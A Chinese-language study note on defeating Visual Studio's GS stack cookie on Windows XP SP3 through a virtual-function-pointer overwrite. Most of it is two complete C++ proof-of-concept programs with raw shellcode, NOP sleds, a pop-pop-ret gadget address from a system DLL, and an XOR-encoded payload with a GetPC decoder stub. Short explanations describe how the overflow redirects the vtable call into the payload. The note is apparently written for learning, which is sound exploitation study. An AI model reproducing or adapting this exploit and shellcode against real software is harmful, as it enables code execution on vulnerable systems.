虚函数绕过 GS保护 学习

#pragma strict_gs_check(on) 强制设置 GS保护  VS2008

当缓冲区<=4字节时  不被 GS保护  设置上面的  可以强制保护

#include "stdafx.h"
#include <windows.h>

#pragma strict_gs_check(on)
void f(char  str[])
{
	char buff[4];
	strcpy(buff,str);
}
int _tmain(int argc, _TCHAR* argv[])
{
	char str[] = "1111";
	f(str);
		return 0;
}

`

可以看到 COOKIE

现在实验    

虚函数情况下  去攻击 GS保护：

/*
XP SP3   
VS2008   GS保护  禁止优化
*/
#include "stdafx.h"
#include "string.h"

class GSVirtual {
public :
	void gsv(char * src)
	{
		char buf[200];
		strcpy(buf, src);
		bar(); // virtual function call
	}
	virtual void  bar()
	{
	}
};
char shellcode[]=
//78542DA6
"xA6x2Dx54x78"
"x90x90x90x90x90x90"


"xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C"
"x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53"
"x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B"
"x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95"
"xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59"
"x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A"
"xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75"
"xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03"
"x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB"
"x53"
"x68x64x61x30x23"
"x68x23x50x61x6E"
"x8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8"//168



"x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"

"x48x30x40x00"
//00403048
;
int main()
{
	GSVirtual test;
	test.gsv(shellcode);
		
	return 0;
}

原理：  修改虚表指针  指向  压入的形参指针  调向我们的字符串起始地址;

进入CALL  后   来到   字符串第一个DWORD  类型指向的地址  

看到堆栈ESP+8 为我们的字符串起始地址

那么  只要 pop pop retn  就能到起始地址去执行

那么找到系统DLL中的这个地址  

复制到字符串开始

那么从字符串开始执行时  

这个找到的DLL系统地址会变成 乱码 （但这样不影响后的shellcode 运行）

如果想要对自己的shellcode进行加密后验证 就还需要些许调整：

#include "stdafx.h"  
#include "string.h"  

class GSVirtual {  
public :  
	void gsv(char * src)  
	{  
		char buf[200];  
		strcpy(buf, src);  
		bar(); // virtual function call  
	}  
	virtual void  bar()  
	{  
	}  
};  
char shellcode[]=  
// 7C921931    5E              pop esi

"x31x19x92x7c"
 
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"xD9xEE"           // fldz
"xD9x74x24xF4"   // fstenv (28-byte) ptr ss:[esp-0xC]
"x58"              //pop eax   得到EIP 转载至http://www.programlife.net/shellcode-getpc.html
"x83xC0x1b"      //add eax,0x19
"x33xC9"         // XOR ECX,ECX  
"x8Ax1Cx08"      //  MOV BL,BYTE PTR DS:[EAX+ECX]  
"x80xF3x11"		//xor bl,0x11
"x88x1Cx08"     //   MOV BYTE PTR DS:[EAX+ECX],BL  
"x41"           // INC ECX  
"x80xFBx90" //      CMP BL,90  
"x75xF1"//         JNZ SHORT shellcod.00401165
//The above is 26 bytes
//The following is 169 bytes
"xedx79x7bx1bx29x0fx79x72x98xc0x5ex79x23x65x80x1d"
"x9axe5x9cx6fxe5x22xcaxa6x15x3axf2x77xaax22x23x42"
"x79x64x62x74x63x45x22xc3x75x9ax4bx21x9ax5ax1dx9a"
"x58x0dx9ax18x9ax78x19xbcx2cx7bx1bx29x0fx64x14x84"
"xeex46xe9x84x71x9ax54x2dx9ax5dx14x69x12xdcx9ax48"
"x31x12xccx22xeex56x9ax25xaax12xe4x88x1exafx17x2b"
"xd5x65x19xd0xdbx16x12xc1x57xfaxe0x2ax45x35x0dx64"
"xf5x9ax48x35x12xccx77x9ax2dx6ax9ax48x0dx12xccx12"
"x3dxaax84x4exbax46x70x2cx7bx1bx29x0fx64xb8x22xca"
"x42x79x75x70x21x32x79x32x41x70x7fx9axd5x42x41x41"
"x42xeex46xedx42xeex46xe9x81"//#panda0#



"x9cxfex12x00"//0012FE9C

//00403048  
;  
int main()  
{  
	GSVirtual test;  
	test.gsv(shellcode);  

	return 0;  
}